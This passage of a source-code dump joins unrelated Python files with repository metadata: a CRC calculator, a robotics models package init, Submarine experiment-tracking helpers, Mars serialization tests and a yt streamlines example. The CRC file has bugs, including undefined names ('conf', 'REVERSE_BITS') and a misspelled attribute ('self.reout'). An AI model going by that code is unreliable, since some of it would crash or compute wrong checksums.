0x0B, 0x8B, 0x4B, 0xCB, 0x2B, 0xAB, 0x6B, 0xEB, 0x1B, 0x9B, 0x5B, 0xDB, 0x3B, 0xBB, 0x7B, 0xFB,
0x07, 0x87, 0x47, 0xC7, 0x27, 0xA7, 0x67, 0xE7, 0x17, 0x97, 0x57, 0xD7, 0x37, 0xB7, 0x77, 0xF7,
0x0F, 0x8F, 0x4F, 0xCF, 0x2F, 0xAF, 0x6F, 0xEF, 0x1F, 0x9F, 0x5F, 0xDF, 0x3F, 0xBF, 0x7F, 0xFF,
]
def reverse_bits(n, width=8):
"""Reverse bit order (not the fastest way)"""
b = '{:0{width}b}'.format(n, width=width)
return int(b[::-1], 2)
def reverse_bits_byte(n):
"""Reverse bit order of bytes (8 bit values) using a look-up table"""
return REVERSE_BITS_LUT[n]
def reverse_bits_word(n):
"""Reverse bit order of words (16 bit values) using a look-up table"""
return (REVERSE_BITS_LUT[(n >> 8) & 0xff] |
REVERSE_BITS_LUT[n & 0xff] << 8)
def reverse_bits_dword(n):
"""Reverse bit order of dwords (32 bit values) using a look-up table"""
return (REVERSE_BITS_LUT[(n >> 24) & 0xff] |
REVERSE_BITS_LUT[(n >> 16) & 0xff] << 8 |
REVERSE_BITS_LUT[(n >> 8) & 0xff] << 16 |
REVERSE_BITS_LUT[n & 0xff] << 24)
class CRC():
"""Simple CRC calculator"""
# input string for CRC check
CHECK_DATA = b'123456789'
# some well-known CRC configurations
CRC_CONFIG = {
# 8 bit
'CRC-8': {'width': 8, 'poly': 0x07, 'init': 0x00, 'refin': False, 'refout': False, 'xorout': 0x00, 'check': 0xF4},
'CRC-8/CDMA2000': {'width': 8, 'poly': 0x9B, 'init': 0xFF, 'refin': False, 'refout': False, 'xorout': 0x00, 'check': 0xDA},
'CRC-8/DARC': {'width': 8, 'poly': 0x39, 'init': 0x00, 'refin': True, 'refout': True, 'xorout': 0x00, 'check': 0x15},
'CRC-8/DVB-S2': {'width': 8, 'poly': 0xD5, 'init': 0x00, 'refin': False, 'refout': False, 'xorout': 0x00, 'check': 0xBC},
'CRC-8/EBU': {'width': 8, 'poly': 0x1D, 'init': 0xFF, 'refin': True, 'refout': True, 'xorout': 0x00, 'check': 0x97},
'CRC-8/I-CODE': {'width': 8, 'poly': 0x1D, 'init': 0xFD, 'refin': False, 'refout': False, 'xorout': 0x00, 'check': 0x7E},
'CRC-8/ITU': {'width': 8, 'poly': 0x07, 'init': 0x00, 'refin': False, 'refout': False, 'xorout': 0x55, 'check': 0xA1},
'CRC-8/MAXIM': {'width': 8, 'poly': 0x31, 'init': 0x00, 'refin': True, 'refout': True, 'xorout': 0x00, 'check': 0xA1},
'CRC-8/ROHC': {'width': 8, 'poly': 0x07, 'init': 0xFF, 'refin': True, 'refout': True, 'xorout': 0x00, 'check': 0xD0},
'CRC-8/WCDMA': {'width': 8, 'poly': 0x9B, 'init': 0x00, 'refin': True, 'refout': True, 'xorout': 0x00, 'check': 0x25},
# 16 bit
'CRC-16/CCITT-FALSE': {'width': 16, 'poly': 0x1021, 'init': 0xFFFF, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x29B1},
'CRC-16/ARC': {'width': 16, 'poly': 0x8005, 'init': 0x0000, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0xBB3D},
'CRC-16/AUG-CCITT': {'width': 16, 'poly': 0x1021, 'init': 0x1D0F, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0xE5CC},
'CRC-16/BUYPASS': {'width': 16, 'poly': 0x8005, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0xFEE8},
'CRC-16/CDMA2000': {'width': 16, 'poly': 0xC867, 'init': 0xFFFF, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x4C06},
'CRC-16/DDS-110': {'width': 16, 'poly': 0x8005, 'init': 0x800D, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x9ECF},
'CRC-16/DECT-R': {'width': 16, 'poly': 0x0589, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0001, 'check': 0x007E},
'CRC-16/DECT-X': {'width': 16, 'poly': 0x0589, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x007F},
'CRC-16/DNP': {'width': 16, 'poly': 0x3D65, 'init': 0x0000, 'refin': True, 'refout': True, 'xorout': 0xFFFF, 'check': 0xEA82},
'CRC-16/EN-13757': {'width': 16, 'poly': 0x3D65, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0xFFFF, 'check': 0xC2B7},
'CRC-16/GENIBUS': {'width': 16, 'poly': 0x1021, 'init': 0xFFFF, 'refin': False, 'refout': False, 'xorout': 0xFFFF, 'check': 0xD64E},
'CRC-16/MAXIM': {'width': 16, 'poly': 0x8005, 'init': 0x0000, 'refin': True, 'refout': True, 'xorout': 0xFFFF, 'check': 0x44C2},
'CRC-16/MCRF4XX': {'width': 16, 'poly': 0x1021, 'init': 0xFFFF, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0x6F91},
'CRC-16/T10-DIF': {'width': 16, 'poly': 0x8BB7, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0xD0DB},
'CRC-16/TELEDISK': {'width': 16, 'poly': 0xA097, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x0FB3},
'CRC-16/TMS37157': {'width': 16, 'poly': 0x1021, 'init': 0x89EC, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0x26B1},
'CRC-16/USB': {'width': 16, 'poly': 0x8005, 'init': 0xFFFF, 'refin': True, 'refout': True, 'xorout': 0xFFFF, 'check': 0xB4C8},
'CRC-A': {'width': 16, 'poly': 0x1021, 'init': 0xC6C6, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0xBF05},
'CRC-16/KERMIT': {'width': 16, 'poly': 0x1021, 'init': 0x0000, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0x2189},
'CRC-16/MODBUS': {'width': 16, 'poly': 0x8005, 'init': 0xFFFF, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0x4B37},
'CRC-16/X-25': {'width': 16, 'poly': 0x1021, 'init': 0xFFFF, 'refin': True, 'refout': True, 'xorout': 0xFFFF, 'check': 0x906E},
'CRC-16/XMODEM': {'width': 16, 'poly': 0x1021, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x31C3},
# 32 bit
'CRC-32': {'width': 32, 'poly': 0x04C11DB7, 'init': 0xFFFFFFFF, 'refin': True, 'refout': True, 'xorout': 0xFFFFFFFF, 'check': 0xCBF43926},
'CRC-32/UBI': {'width': 32, 'poly': 0x04C11DB7, 'init': 0xFFFFFFFF, 'refin': True, 'refout': True, 'xorout': 0x00000000, 'check': 0x340BC6D9},
'CRC-32/BZIP2': {'width': 32, 'poly': 0x04C11DB7, 'init': 0xFFFFFFFF, 'refin': False, 'refout': False, 'xorout': 0xFFFFFFFF, 'check': 0xFC891918},
'CRC-32/32D': {'width': 32, 'poly': 0xA833982B, 'init': 0xFFFFFFFF, 'refin': True, 'refout': True, 'xorout': 0xFFFFFFFF, 'check': 0x87315576},
'CRC-32/MPEG-2': {'width': 32, 'poly': 0x04C11DB7, 'init': 0xFFFFFFFF, 'refin': False, 'refout': False, 'xorout': 0x00000000, 'check': 0x0376E6E7},
'CRC-32/POSIX': {'width': 32, 'poly': 0x04C11DB7, 'init': 0x00000000, 'refin': False, 'refout': False, 'xorout': 0xFFFFFFFF, 'check': 0x765E7680},
'CRC-32/32Q': {'width': 32, 'poly': 0x814141AB, 'init': 0x00000000, 'refin': False, 'refout': False, 'xorout': 0x00000000, 'check': 0x3010BF7F},
'CRC-32/JAMCRC': {'width': 32, 'poly': 0x04C11DB7, 'init': 0xFFFFFFFF, 'refin': True, 'refout': True, 'xorout': 0x00000000, 'check': 0x340BC6D9},
'CRC-32/XFER': {'width': 32, 'poly': 0x000000AF, 'init': 0x00000000, 'refin': False, 'refout': False, 'xorout': 0x00000000, 'check': 0xBD0BE338},
}
def __init__(self):
"""CRC constructor"""
# set default configuration for operating mode
self.config = self.set_config_by_name('CRC-8')
def set_config(self, config):
"""Set CRC configuration"""
try:
# set CRC parameters
self.width = config['width'] # width in bits, e.g. 8, 16, 32
self.poly = config['poly'] # generator polynom
self.check = config['check'] # check value for check input string ("123456789")
self.init = config['init'] # initial value
self.refin = config['refin'] # flag for reflection of input data
self.refout = config['refout'] # flag for reflection of checksum output
self.xorout = config['xorout'] # value for final xor (0x00 if not used)
# set CRC compute method and rebuild look-up table
if self.width == 8:
self.crc_method = self.fast_crc8
self.crc8_table = self.calc_crc8_lut(self.poly)
elif self.width == 16:
self.crc_method = self.fast_crc16
self.crc16_table = self.calc_crc16_lut(self.poly)
elif self.width == 32:
self.crc_method = self.fast_crc32
self.crc32_table = self.calc_crc32_lut(self.poly)
except KeyError:
msg = "Invalid CRC configuration '{}'".format(conf)
raise Exception(msg)
return True
def set_config_by_name(self, crc_name):
"""Set CRC configuration by name"""
try:
# get parameters of specified configuration
config = self.CRC_CONFIG[crc_name.upper()]
# set CRC parameters
self.width = config['width'] # width in bits, e.g. 8, 16, 32
self.poly = config['poly'] # generator polynom
self.check = config['check'] # check value for check input string ("123456789")
self.init = config['init'] # initial value
self.refin = config['refin'] # flag for reflection of input data
self.refout = config['refout'] # flag for reflection of checksum output
self.xorout = config['xorout'] # value for final xor (0x00 if not used)
# set CRC compute method and rebuild look-up table
if self.width == 8:
self.crc_method = self.fast_crc8
self.crc8_table = self.calc_crc8_lut(self.poly)
elif self.width == 16:
self.crc_method = self.fast_crc16
self.crc16_table = self.calc_crc16_lut(self.poly)
elif self.width == 32:
self.crc_method = self.crc32
self.crc32_table = self.calc_crc32_lut(self.poly)
except KeyError:
msg = "Could not set CRC configuration '{}'".format(crc_name)
raise Exception(msg)
return True
def compute(self, data):
"""Compute CRC with the current active configuration"""
result = self.crc_method(data)
return result
def self_test(self):
"""Perform a self-test with all CRC configurations"""
success = True
print("[*] Starting CRC self-test ({} configurations)".format(len(CRC.CRC_CONFIG)))
for conf in CRC.CRC_CONFIG.keys():
self.set_config_by_name(conf)
crc = self.compute(CRC.CHECK_DATA)
passed = (crc == self.check)
print("{}: result = 0x{:0X}, check = 0x{:0X}, passed = {}".format(conf, crc, self.check, passed))
if not passed:
success = False
if success:
print("[*] CRC self-test completed successfully")
else:
print("[*] CRC self-test completed not successfully")
return success
def crc8(self, data):
"""Calculate CRC-8
Bitwise implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
if self.refin:
crc ^= REVERSE_BITS_LUT[b]
else:
crc ^= b
# process bits of data byte
for i in range(8):
if (crc & 0x80) != 0:
crc = (crc << 1) ^ self.poly
else:
crc <<= 1
if self.refout:
crc = REVERSE_BITS_LUT[crc & 0xff]
# return CRC-8
return (crc ^ self.xorout) & 0xff
def calc_crc8_lut(self, generator):
"""Calculate look-up table for CRC-8"""
# CRC-8 look-up table
self.crc8_table = [None] * 256
# calculate all possible 256 byte values
for divident in range(256):
b = divident
# process bits of data byte
for bit in range(8):
if (b & 0x80) != 0:
b <<= 1
b ^= generator
else:
b <<= 1
# store CRC value in look-up table
self.crc8_table[divident] = b
# return generated CRC-8 look-up table
return self.crc8_table
def fast_crc8(self, data):
"""Calculate CRC-8
Look-up table implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
if self.refin:
b = REVERSE_BITS_LUT[b]
# xor next input byte with CRC
d = (b ^ crc) & 0xff
# get CRC value from look-up table
crc = self.crc8_table[d]
# CRC reflection
if self.refout:
crc = REVERSE_BITS_LUT[crc & 0xff]
# return CRC-8
return (crc ^ self.xorout) & 0xff
def crc16(self, data):
"""Calculate CRC-16
Bitwise implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
# xor data byte with most significant byte of 16 bit CRC
if self.refin:
crc ^= REVERSE_BITS_LUT[b] << 8
else:
crc ^= (b << 8)
# process bits of data byte
for i in range(8):
# check if most significant bit is set
if (crc & 0x8000) != 0:
crc = (crc << 1) ^ self.poly
else:
crc <<= 1
# CRC reflection
if self.refout:
crc = reverse_bits_word(crc & 0xffff)
# return CRC-16
return (crc ^ self.xorout) & 0xffff
def calc_crc16_lut(self, generator):
"""Calculate look-up table for CRC-16"""
# CRC-16 look-up table
self.crc16_table = [None] * 256
# calculate all possible 256 byte values
for divident in range(256):
# move divident byte into most significant byte of 16 bit CRC
b = (divident << 8)
# process bits of data byte
for bit in range(8):
if (b & 0x8000) != 0:
b <<= 1
b ^= generator
else:
b <<= 1
# store CRC value in look-up table
self.crc16_table[divident] = b
# return generated CRC-16 look-up table
return self.crc16_table
def fast_crc16(self, data):
"""Calculate CRC-16
Look-up table implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
if self.refin:
b = REVERSE_BITS_LUT[b]
# xor next input byte with most significant byte of CRC
d = (b ^ (crc >> 8)) & 0xff
# get CRC value from look-up table
crc = (crc << 8) ^ self.crc16_table[d]
# CRC reflection
if self.refout:
crc = reverse_bits_word(crc & 0xffff)
# return CRC-16
return (crc ^ self.xorout) & 0xffff
def crc32(self, data):
"""Calculate CRC-32
Bitwise implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
# xor data byte with most significant byte of 32 bit CRC
if self.refin:
crc ^= REVERSE_BITS_LUT[b] << 24
else:
crc ^= (b << 24)
# process bits of data byte
for i in range(8):
# check if most significant bit is set
if (crc & 0x80000000) != 0:
crc = (crc << 1) ^ self.poly
else:
crc <<= 1
# CRC reflection
if self.refout:
crc = reverse_bits_dword(crc & 0xffffffff)
# return CRC-32
return (crc ^ self.xorout) & 0xffffffff
def calc_crc32_lut(self, generator):
"""Calculate look-up table for CRC-32"""
# CRC-32 look-up table
self.crc32_table = [None] * 256
# calculate all possible 256 byte values
for divident in range(256):
# move divident byte into most significant byte of 32 bit CRC
b = (divident << 24)
# process bits of data byte
for bit in range(8):
if (b & 0x80000000) != 0:
b <<= 1
b ^= generator
else:
b <<= 1
# store CRC value in look-up table
self.crc32_table[divident] = b
# return generated CRC-32 look-up table
return self.crc32_table
def fast_crc32(self, data):
"""Calculate CRC-32
Look-up table implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
if self.refin:
b = REVERSE_BITS[b]
# xor next input byte with most significant byte of CRC
d = (((b << 24) ^ crc) >> 24) & 0xff
# get CRC value from look-up table
crc = (crc << 8) ^ self.crc32_table[d]
# CRC reflection
if self.refout:
crc = reverse_bits_dword(crc & 0xffffffff)
# return CRC-32
return (crc ^ self.xorout) & 0xffffffff
def find_config(self, width, target, only_known=False, max_poly=0xff, max_init=0xff, max_xor=0xff):
"""Try to find a suitable CRC config for a given CRC and data
in the most simple and not efficient way
"""
# first, test all known CRC configurations with the given width
for conf in CRC.CRC_CONFIG.keys():
self.set_config_by_name(conf)
# test CRC for all given targets and count matches
match_count = 0
for t in target:
c = self.compute(t[0])
if c == t[1]:
match_count += 1
else:
break
if match_count == len(target):
return (conf, CRC.CRC_CONFIG[conf])
# if only known CRC configurations should be searched, return here
# without result
if only_known:
return None
# create initial config
config = {'width': width, 'poly': 0, 'init': 0, 'refin': False, 'refout': False, 'xorout': 0x00, 'check': 0x00}
self.width = width
self.refin = False
self.refout = False
self.xorout = 0x00
# set CRC compute method and rebuild look-up table
if self.width == 8:
self.crc_method = self.fast_crc8
self.crc8_table = self.calc_crc8_lut(self.poly)
update_table = self.calc_crc8_lut
elif self.width == 16:
self.crc_method = self.fast_crc16
self.crc16_table = self.calc_crc16_lut(self.poly)
update_table = self.calc_crc16_lut
elif self.width == 32:
self.crc_method = self.crc32
self.crc32_table = self.calc_crc32_lut(self.poly)
update_table = self.calc_crc32_lut
# test all possible xor values
for xorout in range(max_xor):
self.xorout = xorout
# test all possibly generator polynoms
for poly in range(1, max_poly):
self.poly = poly
# update CRC table for new generator polynom
update_table(self.poly)
# test all possible init values
for init in range(max_init):
self.init = init
# check configuration for all targets with all possible
# configurations
# refin=False, refout=False
self.refin = False
self.refout = False
# test CRC for all given targets and count matches
match_count = 0
for t in target:
c = self.compute(t[0])
if c == t[1]:
match_count += 1
else:
break
if match_count == len(target):
# set found config parameters in config
config['poly'] = self.poly
config['init'] = self.init
config['xorout'] = self.xorout
config['refin'] = self.refin
config['refout'] = self.refout
config['check'] = self.compute(CRC.CHECK_DATA)
return ('unknown', config)
# refin=True, refout=False
self.refin = True
self.reout = False
# test CRC for all given targets and count matches
match_count = 0
for t in target:
c = self.compute(t[0])
if c == t[1]:
match_count += 1
else:
break
if match_count == len(target):
# set found config parameters in config
config['poly'] = self.poly
config['init'] = self.init
config['xorout'] = self.xorout
config['refin'] = self.refin
config['refout'] = self.refout
config['check'] = self.compute(CRC.CHECK_DATA)
return ('unknown', config)
# refin=False, refout=True
self.refin = False
self.refout = True
# test CRC for all given targets and count matches
match_count = 0
for t in target:
c = self.compute(t[0])
if c == t[1]:
match_count += 1
else:
break
if match_count == len(target):
# set found config parameters in config
config['poly'] = self.poly
config['init'] = self.init
config['xorout'] = self.xorout
config['refin'] = self.refin
config['refout'] = self.refout
config['check'] = self.compute(CRC.CHECK_DATA)
return ('unknown', config)
# refin=True, refout=True
self.refin = True
self.refout = True
# test CRC for all given targets and count matches
match_count = 0
for t in target:
c = self.compute(t[0])
if c == t[1]:
match_count += 1
else:
break
if match_count == len(target):
# set found config parameters in config
config['poly'] = self.poly
config['init'] = self.init
config['xorout'] = self.xorout
config['refin'] = self.refin
config['refout'] = self.refout
config['check'] = self.compute(CRC.CHECK_DATA)
return ('unknown', config)
return None
# main
if __name__ == "__main__":
# CRC self-test
crc = CRC()
data = b"123456789"
crc.self_test()
| 40.885023 | 159 | 0.530768 |
4a223c1968ac215bcd594b0e934ebb68c4ca89e0 | 1,078 | py | Python | ravens/ravens/models/__init__.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 23,901 | 2018-10-04T19:48:53.000Z | 2022-03-31T21:27:42.000Z | ravens/ravens/models/__init__.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 891 | 2018-11-10T06:16:13.000Z | 2022-03-31T10:42:34.000Z | ravens/ravens/models/__init__.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 6,047 | 2018-10-12T06:31:02.000Z | 2022-03-31T13:59:28.000Z | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Ravens models package."""
from ravens.models.attention import Attention
from ravens.models.conv_mlp import ConvMLP
from ravens.models.conv_mlp import DeepConvMLP
from ravens.models.gt_state import MlpModel
from ravens.models.matching import Matching
from ravens.models.regression import Regression
from ravens.models.transport import Transport
from ravens.models.transport_ablation import TransportPerPixelLoss
from ravens.models.transport_goal import TransportGoal
| 39.925926 | 74 | 0.805195 |
4a223e129e82d540a0761ed5df9907573ab06e48 | 3,368 | py | Python | submarine-sdk/pysubmarine/submarine/tracking/utils.py | RamakrishnaChilaka/submarine | e8104e5935a0b15d7ccbb000650f2bfe90525ba0 | [
"Apache-2.0"
] | 2 | 2020-02-07T07:12:56.000Z | 2021-08-29T10:47:20.000Z | submarine-sdk/pysubmarine/submarine/tracking/utils.py | RamakrishnaChilaka/submarine | e8104e5935a0b15d7ccbb000650f2bfe90525ba0 | [
"Apache-2.0"
] | null | null | null | submarine-sdk/pysubmarine/submarine/tracking/utils.py | RamakrishnaChilaka/submarine | e8104e5935a0b15d7ccbb000650f2bfe90525ba0 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import os
import uuid
from submarine.utils import env
_TRACKING_URI_ENV_VAR = "SUBMARINE_TRACKING_URI"
# https://github.com/linkedin/TonY/pull/431
_JOB_ID_ENV_VAR = "JOB_ID"
_TF_CONFIG = "TF_CONFIG"
_CLUSTER_SPEC = "CLUSTER_SPEC"
_JOB_NAME = "JOB_NAME"
_TYPE = "type"
_TASK = "task"
_INDEX = "index"
_RANK = "RANK"
# Extra environment variables which take precedence for setting the basic/bearer
# auth on http requests.
_TRACKING_USERNAME_ENV_VAR = "SUBMARINE_TRACKING_USERNAME"
_TRACKING_PASSWORD_ENV_VAR = "SUBMARINE_TRACKING_PASSWORD"
_TRACKING_TOKEN_ENV_VAR = "SUBMARINE_TRACKING_TOKEN"
_TRACKING_INSECURE_TLS_ENV_VAR = "SUBMARINE_TRACKING_INSECURE_TLS"
def get_job_id():
"""
Get the current experiment id.
:return The experiment id:
"""
# Get yarn application or K8s experiment ID when running distributed training
if env.get_env(_JOB_ID_ENV_VAR) is not None:
return env.get_env(_JOB_ID_ENV_VAR)
else: # set Random ID when running local training
job_id = uuid.uuid4().hex
os.environ[_JOB_ID_ENV_VAR] = job_id
return job_id
def get_worker_index():
"""
Get the current worker index.
:return: The worker index:
"""
# Get TensorFlow worker index
if env.get_env(_TF_CONFIG) is not None:
tf_config = json.loads(os.environ.get(_TF_CONFIG))
task_config = tf_config.get(_TASK)
task_type = task_config.get(_TYPE)
task_index = task_config.get(_INDEX)
worker_index = task_type + "-" + str(task_index)
elif env.get_env(_CLUSTER_SPEC) is not None:
cluster_spec = json.loads(os.environ.get(_CLUSTER_SPEC))
task_config = cluster_spec.get(_TASK)
task_type = task_config.get(_JOB_NAME)
task_index = task_config.get(_INDEX)
worker_index = task_type + "-" + str(task_index)
# Get PyTorch worker index
elif env.get_env(_RANK) is not None:
rank = env.get_env(_RANK)
if rank == "0":
worker_index = "master-0"
else:
worker_index = "worker-" + rank
# Set worker index to "worker-0" When running local training
else:
worker_index = "worker-0"
return worker_index
def get_tracking_sqlalchemy_store(store_uri: str):
from submarine.store.tracking.sqlalchemy_store import SqlAlchemyStore
return SqlAlchemyStore(store_uri)
def get_model_registry_sqlalchemy_store(store_uri: str):
from submarine.store.model_registry.sqlalchemy_store import SqlAlchemyStore
return SqlAlchemyStore(store_uri)
| 33.68 | 81 | 0.731295 |
4a223eaef059d9d8e3ce203f05e60215ef44885b | 5,130 | py | Python | mars/serialization/tests/test_serial.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | 1 | 2021-09-03T18:52:06.000Z | 2021-09-03T18:52:06.000Z | mars/serialization/tests/test_serial.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | null | null | null | mars/serialization/tests/test_serial.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | null | null | null | # Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict
import numpy as np
import pandas as pd
import pytest
try:
import pyarrow as pa
except ImportError:
pa = None
try:
import scipy.sparse as sps
except ImportError:
sps = None
from mars.lib.sparse import SparseMatrix
from mars.serialization import serialize, deserialize
from mars.tests.core import require_cupy, require_cudf
from mars.utils import lazy_import
cupy = lazy_import('cupy', globals=globals())
cudf = lazy_import('cudf', globals=globals())
class CustomList(list):
pass
@pytest.mark.parametrize(
'val', [
False, 123, 3.567, 3.5 + 4.3j, b'abcd', 'abcd',
['uvw', ('mno', 'sdaf'), 4, 6.7],
CustomList([3, 4, CustomList([5, 6])]),
{'abc': 5.6, 'def': [3.4]},
OrderedDict([('abcd', 5.6)])
]
)
def test_core(val):
deserialized = deserialize(*serialize(val))
assert type(val) == type(deserialized)
assert val == deserialized
def test_nested_list():
val = ['a' * 100] * 100
val[0] = val
deserialized = deserialize(*serialize(val))
assert deserialized[0] is deserialized
assert val[1:] == deserialized[1:]
class KeyedDict(dict):
def _skeys(self):
return set(k for k in self.keys() if isinstance(k, str))
def __hash__(self):
return hash(frozenset(self._skeys()))
def __eq__(self, other: 'KeyedDict'):
return self._skeys() == other._skeys()
def test_nested_dict():
val = {i: 'b' * 100 for i in range(10)}
val[0] = val
deserialized = deserialize(*serialize(val))
assert deserialized[0] is deserialized
val = KeyedDict(abcd='efgh')
val[val] = val
deserialized = deserialize(*serialize(val))
assert deserialized[val] is deserialized
class DictWithoutInitArgs(dict):
# dict inheritance without args in __init__
def __init__(self):
super().__init__()
def test_dict_without_init_args():
val = DictWithoutInitArgs()
val['a'] = 'b'
deserialized = deserialize(*serialize(val))
assert deserialized == val
@pytest.mark.parametrize(
'val', [
np.array(np.random.rand(100, 100)),
np.array(np.random.rand(100, 100).T),
np.array(['a', 'bcd', None]),
]
)
def test_numpy(val):
deserialized = deserialize(*serialize(val))
assert type(val) == type(deserialized)
np.testing.assert_equal(val, deserialized)
if val.flags.f_contiguous:
assert deserialized.flags.f_contiguous
def test_pandas():
val = pd.Series([1, 2, 3, 4])
pd.testing.assert_series_equal(val, deserialize(*serialize(val)))
val = pd.DataFrame({
'a': np.random.rand(1000),
'b': np.random.choice(list('abcd'), size=(1000,)),
'c': np.random.randint(0, 100, size=(1000,)),
})
pd.testing.assert_frame_equal(val, deserialize(*serialize(val)))
@pytest.mark.skipif(pa is None, reason='need pyarrow to run the cases')
def test_arrow():
test_df = pd.DataFrame({
'a': np.random.rand(1000),
'b': np.random.choice(list('abcd'), size=(1000,)),
'c': np.random.randint(0, 100, size=(1000,)),
})
test_vals = [
pa.RecordBatch.from_pandas(test_df),
pa.Table.from_pandas(test_df),
]
for val in test_vals:
deserialized = deserialize(*serialize(val))
assert type(val) is type(deserialized)
np.testing.assert_equal(val, deserialized)
@pytest.mark.parametrize(
'np_val', [
np.random.rand(100, 100),
np.random.rand(100, 100).T,
]
)
@require_cupy
def test_cupy(np_val):
val = cupy.array(np_val)
deserialized = deserialize(*serialize(val))
assert type(val) is type(deserialized)
cupy.testing.assert_array_equal(val, deserialized)
@require_cudf
def test_cudf():
test_df = cudf.DataFrame(pd.DataFrame({
'a': np.random.rand(1000),
'b': np.random.choice(list('abcd'), size=(1000,)),
'c': np.random.randint(0, 100, size=(1000,)),
}))
cudf.testing.assert_frame_equal(test_df, deserialize(*serialize(test_df)))
@pytest.mark.skipif(sps is None, reason='need scipy to run the test')
def test_scipy_sparse():
val = sps.random(100, 100, 0.1, format='csr')
deserial = deserialize(*serialize(val))
assert (val != deserial).nnz == 0
@pytest.mark.skipif(sps is None, reason='need scipy to run the test')
def test_mars_sparse():
val = SparseMatrix(sps.random(100, 100, 0.1, format='csr'))
deserial = deserialize(*serialize(val))
assert (val.spmatrix != deserial.spmatrix).nnz == 0
| 28.186813 | 78 | 0.659259 |
4a2240f91e63b384458174f96a243f5159a1e5c2 | 1,153 | py | Python | doc/source/cookbook/streamlines.py | kastalpes/yt | b1e197ca84433fbd61eaf44b28ff5cdb37981d4c | [
"BSD-3-Clause-Clear"
] | 2 | 2021-03-02T18:59:49.000Z | 2021-03-02T18:59:50.000Z | doc/source/cookbook/streamlines.py | kastalpes/yt | b1e197ca84433fbd61eaf44b28ff5cdb37981d4c | [
"BSD-3-Clause-Clear"
] | 4 | 2018-04-13T23:03:42.000Z | 2018-05-08T17:50:43.000Z | doc/source/cookbook/streamlines.py | kastalpes/yt | b1e197ca84433fbd61eaf44b28ff5cdb37981d4c | [
"BSD-3-Clause-Clear"
] | 2 | 2020-05-16T15:29:37.000Z | 2020-06-22T10:17:08.000Z | import yt
import numpy as np
import matplotlib.pylab as pl
from yt.visualization.api import Streamlines
from yt.units import Mpc
from mpl_toolkits.mplot3d import Axes3D
# Load the dataset
ds = yt.load('IsolatedGalaxy/galaxy0030/galaxy0030')
# Define c: the center of the box, N: the number of streamlines,
# scale: the spatial scale of the streamlines relative to the boxsize,
# and then pos: the random positions of the streamlines.
c = ds.domain_center
N = 100
scale = ds.domain_width[0]
pos_dx = np.random.random((N,3))*scale-scale/2.
pos = c+pos_dx
# Create streamlines of the 3D vector velocity and integrate them through
# the box defined above
streamlines = Streamlines(ds, pos, 'velocity_x', 'velocity_y', 'velocity_z',
length=1.0*Mpc, get_magnitude=True)
streamlines.integrate_through_volume()
# Create a 3D plot, trace the streamlines through the 3D volume of the plot
fig=pl.figure()
ax = Axes3D(fig)
for stream in streamlines.streamlines:
stream = stream[np.all(stream != 0.0, axis=1)]
ax.plot3D(stream[:,0], stream[:,1], stream[:,2], alpha=0.1)
# Save the plot to disk.
pl.savefig('streamlines.png')
| 32.027778 | 76 | 0.734605 |
